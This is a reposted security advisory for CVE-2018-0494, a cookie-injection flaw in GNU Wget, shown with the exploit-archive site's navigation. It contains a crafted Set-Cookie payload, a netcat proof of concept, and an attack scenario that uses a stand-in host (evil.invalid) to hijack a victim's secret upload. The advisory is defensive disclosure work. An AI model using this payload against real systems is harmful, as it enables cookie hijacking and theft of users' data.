首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GNU wget - Cookie Injection
来源:https://sintonen.fi 作者:Sintonen 发布时间:2018-05-10  
GNU Wget Cookie Injection [CVE-2018-0494]
=========================================
The latest version of this advisory is available at:
https://sintonen.fi/advisories/gnu-wget-cookie-injection.txt
 
 
Overview
--------
 
GNU Wget is susceptible to a malicious web server injecting arbitrary cookies to
the cookie jar file.
 
 
Description
-----------
 
Normally a website should not be able to set cookies for other domains. Due to
insufficient input validation GNU Wget can be tricked into storing arbitrary cookie
values to the cookie jar file, bypassing this security restriction.
 
 
Impact
------
 
An external attacker is able to inject arbitrary cookie values cookie jar file,
adding new or replacing existing cookie values.
 
 
Details
-------
 
The discovered vulnerability, described in more detail below, enables the attack
described here in brief.
 
1. The attacker controlled web site sends a specially crafted Set-Cookie -header
   to inject a new authentication cookie for example.com, replacing the existing
   one. In order to be successful the victim must perform a wget operation on the
   attacker controller site, for example:
   wget --load-cookies jar.txt --save-cookies jar.txt https://evil.invalid
2. Victim uses wget to post some secret the the api.example.com:
   wget --load-cookies jar.txt --post-file secret.txt https://example.com/upload
 
Since the attacker was able to replace the authentication cookie for example.com,
the secret.txt data will be posted to attacker's account instead to that of the
victim.
 
 
Vulnerabilities
---------------
 
1. CWE-20: Improper Input Validation in Set-Cookie parsing [CVE-2018-0494]
 
The cookie parsing implementation does too lax input validation when parsing the
Set-Cookie response from the server. Consider the following malicious response:
 
HTTP/1.1 200 OK
Content-Length: 0
Set-Cookie: foo="bar
 .google.com    TRUE    /       FALSE   1900000000      injected        cookie
        ";expires=Thursday, 01-Jan-2032 08:00:00 GMT
 
 
When parsed by Wget and stored to a cookie jar file it will appear as:
 
# HTTP cookie file.
# Generated by Wget on 2018-04-27 23:28:21.
# Edit at your own risk.
 
127.0.0.1:7777  FALSE   /       FALSE   1956556800      foo     "bar
 .google.com    TRUE    /       FALSE   1900000000      injected        cookie
        "
 
Since the Wget cookie jar parser skips any leading spaces, the .google.com line
will be picked up.
 
Note: The order in which the hosts/domains are stored in the cookie jar is derived
from the hashing function used to speed up the lookups. If an existing cookie is
to be replaced the server hostname used to serve the Set-Cookie will need to be
carefully chosen to result in hash entry below the targeted domain. If not done,
the original cookie will be used instead of the injected one.
 
 
Proof of Concept
----------------
 
1. Set up a minimal web server, good for 1 request:
 $ echo -ne 'HTTP/1.1 200 OK\r\nContent-Length: 0\r\nSet-Cookie:
foo="bar\r\n\x20.google.com\tTRUE\t/\tFALSE\t1900000000\tinjected\tcookie\r\n\t";expires=Thursday, 01-Jan-2032 08:00:00
GMT\r\n\r\n' | nc -v -l 7777
 
2. Fetch the evil url:
 $ wget --save-cookies jar.txt http://127.0.0.1:7777/plop
 
3. Examine the resulting cookie jar file:
 $ cat jar.txt
 
 
Vulnerable versions
-------------------
 
The following GNU Wget versions are confirmed vulnerable:
 
- 1.7 thru 1.19.4
 
 
Mitigation
----------
 
1. Upgrade to GNU Wget 1.19.5 or later, or to appropriate security updated package
   in your distribution
 
 
Credits
-------
 
The vulnerability was discovered by Harry Sintonen / F-Secure Corporation.
 
 
Timeline
--------
 
2018.04.26  discovered & reported the vulnerability
2018.04.27  CVE-2018-0494 assigned
2018.05.06  GNU Wget 1.19.5 released with the fix
2018.05.06  public disclosure of the advisory
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·2345 Security Guard 3.7 - Deni
·FxCop 10/12 - XML External Ent
·FTPShell Client 6.7 - Buffer O
·Palo Alto Networks readSession
·PlaySMS import.php Code Execut
·PlaySMS sendfromfile.php Code
·WordPress Plugin User Role Edi
·HWiNFO 5.82-3410 - Denial of S
·DeviceLock Plug and Play Audit
·Windows WMI - Recieve Notifica
·Windows - Local Privilege Esca
·Linux Kernel < 4.17-rc1 - 'AF_
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved